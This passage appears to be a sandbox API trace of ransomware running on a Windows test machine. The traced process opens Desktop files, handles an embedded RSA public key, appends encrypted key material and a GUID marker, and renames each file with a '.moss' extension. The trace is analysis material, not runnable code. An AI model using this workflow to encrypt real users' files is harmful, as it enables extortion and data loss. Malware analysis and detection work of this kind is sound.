lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.495] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.495] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.497] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.497] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb467a0c0, ftCreationTime.dwHighDateTime=0x1d5e822, ftLastAccessTime.dwLowDateTime=0x71f21220, ftLastAccessTime.dwHighDateTime=0x1d5df5d, ftLastWriteTime.dwLowDateTime=0x71f21220, ftLastWriteTime.dwHighDateTime=0x1d5df5d, nFileSizeHigh=0x0, nFileSizeLow=0x156b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vwxr.png", cAlternateFileName="")) returned 1 [0169.497] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vwxr.png") returned=".png" [0169.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vwxr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vwxr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.498] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=87730) returned 1 [0169.498] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.502] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1568c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.502] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.504] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x156b2, lpOverlapped=0x0) returned 1 [0169.505] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.505] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.505] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.505] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.506] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.506] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.506] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.506] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.506] GetLastError () returned 0x0 [0169.507] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.507] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.507] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.507] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.507] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x156b0) returned 0x3b62d40 [0169.507] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45620 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe70 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45668 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe88 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbeb8 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbed0 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.508] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b783f8 [0169.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbeb8 | out: hHeap=0xcd0000) returned 1 [0169.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbed0 | out: hHeap=0xcd0000) returned 1 [0169.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b783f8 | out: hHeap=0xcd0000) returned 1 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbed0 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbeb8 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbed0 | out: hHeap=0xcd0000) returned 1 [0169.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbeb8 | out: hHeap=0xcd0000) returned 1 [0169.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.509] GetCurrentThreadId () returned 0x324 [0169.509] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd323f0 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.510] GetCurrentThreadId () returned 0x324 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbeb8 [0169.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbed0 [0169.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbea0 [0169.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0169.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbee8 [0169.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbeb8 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbeb8 [0169.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbeb8 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b783f8 [0169.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b783f8 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbee8 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbed0 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbea0 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.514] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x156b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.514] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.514] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.514] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.514] CloseHandle (hObject=0x664) returned 1 [0169.520] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.520] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0169.520] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vwxr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vwxr.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vwxr.png.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vwxr.png.moss")) returned 1 [0169.522] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a626090, ftCreationTime.dwHighDateTime=0x1d5d840, ftLastAccessTime.dwLowDateTime=0xbc2c4560, ftLastAccessTime.dwHighDateTime=0x1d5d91b, ftLastWriteTime.dwLowDateTime=0xbc2c4560, ftLastWriteTime.dwHighDateTime=0x1d5d91b, nFileSizeHigh=0x0, nFileSizeLow=0x14ba7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W7aD8sWB.mkv", cAlternateFileName="")) returned 1 [0169.522] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.522] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0169.524] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W7aD8sWB.mkv") returned=".mkv" [0169.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W7aD8sWB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w7ad8swb.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.524] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=84903) returned 1 [0169.524] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.529] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x14b81, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.529] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.530] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x14ba7, lpOverlapped=0x0) returned 1 [0169.531] lstrlenA (lpString="-----BEGIN PUBLIC 